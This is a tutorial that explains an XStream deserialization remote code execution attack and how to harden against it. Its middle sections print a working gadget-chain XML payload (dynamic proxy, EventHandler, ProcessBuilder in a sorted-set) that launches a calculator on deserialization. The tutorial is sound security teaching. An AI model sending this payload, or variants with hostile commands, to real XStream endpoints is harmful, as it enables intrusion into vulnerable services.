1. Overview

In this tutorial, we’ll dissect a Remote Code Execution attack against the XStream XML serialization library. This exploit falls into the untrusted deserialization category of attacks.

We’ll learn when XStream is vulnerable to this attack, how the attack works, and how to prevent such attacks.

2. XStream Basics

Before describing the attack, let’s review some XStream basics. XStream is an XML serialization library that translates between Java types and XML. Consider a simple Person class:

public class Person {
    private String first;
    private String last;

    // standard getters and setters
}

Let’s see how XStream can write some Person instance to XML:

XStream xstream = new XStream();
String xml = xstream.toXML(person);

Likewise, XStream can read XML into an instance of Person:

XStream xstream = new XStream();
xstream.alias("person", Person.class);
String xml = "<person><first>John</first><last>Smith</last></person>";
Person person = (Person) xstream.fromXML(xml);

In both cases, XStream uses Java reflection to translate the Person type to and from XML. The attack takes place during reading XML. When reading XML, XStream instantiates Java classes using reflection.

The classes XStream instantiates are determined by the names of the XML elements it parses.

Because we configured XStream to be aware of the Person type, XStream instantiates a new Person when it parses XML elements named “person”.

In addition to user-defined types like Person, XStream recognizes core Java types out of the box. For example, XStream can read a Map from XML:

String xml = "" 
    + "<map>" 
    + "  <element>" 
    + "    <string>foo</string>" 
    + "    <int>10</int>" 
    + "  </element>" 
    + "</map>";
XStream xStream = new XStream();
Map<String, Integer> map = (Map<String, Integer>) xStream.fromXML(xml);

We’ll see how XStream’s ability to read XML representing core Java types will be helpful in the remote code execution exploit.

3. How the Attack Works

Remote code execution attacks occur when attackers provide input which is ultimately interpreted as code. In this case, attackers exploit XStream’s deserialization strategy by providing attack code as XML.

With the right composition of classes, XStream ultimately runs the attack code through Java reflection.

Let’s build an example attack.

3.1. Include Attack Code in a ProcessBuilder

Our attack aims to start a new desktop calculator process. On macOS, this is “/Applications/Calculator.app”. On Windows, this is “calc.exe”. To do so, we’ll trick XStream into running a new process using a ProcessBuilder. Recall the Java code to start a new process:

new ProcessBuilder().command("executable-name-here").start();

When reading XML, XStream only invokes constructors and sets fields. Therefore, the attacker does not have a straightforward way to invoke the ProcessBuilder.start() method.

However, clever attackers can use the right composition of classes to ultimately execute the ProcessBuilder‘s start() method.

Security researcher Dinis Cruz shows us in their blog post how they use the Comparable interface to invoke the attack code in the copy constructor of the sorted collection TreeSet. We’ll summarize the approach here.

3.2. Create a Comparable Dynamic Proxy

Recall that the attacker needs to create a ProcessBuilder and invoke its start() method. In order to do so, we’ll create an instance of Comparable whose compare method invokes the ProcessBuilder‘s start() method.

Fortunately, Java Dynamic Proxies allow us to create an instance of Comparable dynamically.**

Furthermore, Java’s EventHandler class provides the attacker with a configurable InvocationHandler implementation. *The attacker configures the EventHandler to invoke the ProcessBuilder‘s start() method.*

Putting these components together, we have an XStream XML representation for the Comparable proxy:

<dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>open</string>
                <string>/Applications/Calculator.app</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>

3.3. Force a Comparison Using the Comparable Dynamic Proxy

To force a comparison with our Comparable proxy, we’ll build a sorted collection. Let’s build a TreeSet collection that compares two Comparable instances: a String and our proxy.

We’ll use TreeSet‘s copy constructor to build this collection. Finally, we have the XStream XML representation for a new TreeSet containing our proxy and a String:

<sorted-set>
    <string>foo</string>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                <command>
                    <string>open</string>
                    <string>/Applications/Calculator.app</string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

Ultimately, the attack occurs when XStream reads this XML. While the developer expects XStream to read a Person, it instead executes the attack:

String sortedSortAttack = // XML from above
XStream xstream = new XStream();
Person person = (Person) xstream.fromXML(sortedSortAttack);

3.4. Attack Summary

Let’s summarize the reflective calls that XStream makes when it deserializes this XML

  1. XStream invokes the TreeSet copy constructor with a Collection containing a String “foo” and our Comparable proxy.
  2. The TreeSet constructor calls our Comparable proxy’s compareTo method in order to determine the order of the items in the sorted set.
  3. Our Comparable dynamic proxy delegates all method calls to the EventHandler.
  4. The EventHandler is configured to invoke the start() method of the ProcessBuilder it composes.
  5. The ProcessBuilder forks a new process running the command the attacker wishes to execute.

4. When Is XStream Vulnerable?

XStream can be vulnerable to this remote code execution attack when the attacker controls the XML it reads.

For instance, consider a REST API that accepts XML input. If this REST API uses XStream to read XML request bodies, then it may be vulnerable to a remote code execution attack because attackers control the content of the XML sent to the API.

On the other hand, an application that only uses XStream to read trusted XML has a much smaller attack surface.

For example, consider an application that only uses XStream to read XML configuration files set by an application administrator. This application is not exposed to XStream remote code execution because attackers are not in control of the XML the application reads (the admin is).

5. Hardening XStream Against Remote Code Execution Attacks

Fortunately, XStream introduced a security framework in version 1.4.7. We can use the security framework to harden our example against remote code execution attacks. The security framework allows us to configure XStream with a whitelist of types it is allowed to instantiate.

This list will only include basic types and our Person class:

XStream xstream = new XStream();
xstream.addPermission(NoTypePermission.NONE);
xstream.addPermission(NullPermission.NULL);
xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
xstream.allowTypes(new Class<?>[] { Person.class });

Additionally, XStream users may consider hardening their systems using a Runtime Application Self-Protection (RASP) agent. RASP agents use bytecode instrumentation at run time to automatically detect and block attacks. This technique is less error-prone than manually building a whitelist of types.

6. Conclusion

In this article, we learned how to perform a remote code execution attack on an application that uses XStream to read XML. Because attacks like this exist, XStream must be hardened when it is used to read XML from untrusted sources.

The exploit exists because XStream uses reflection to instantiate Java classes identified by the attacker’s XML.

As always, the code for the examples can be found over on GitHub.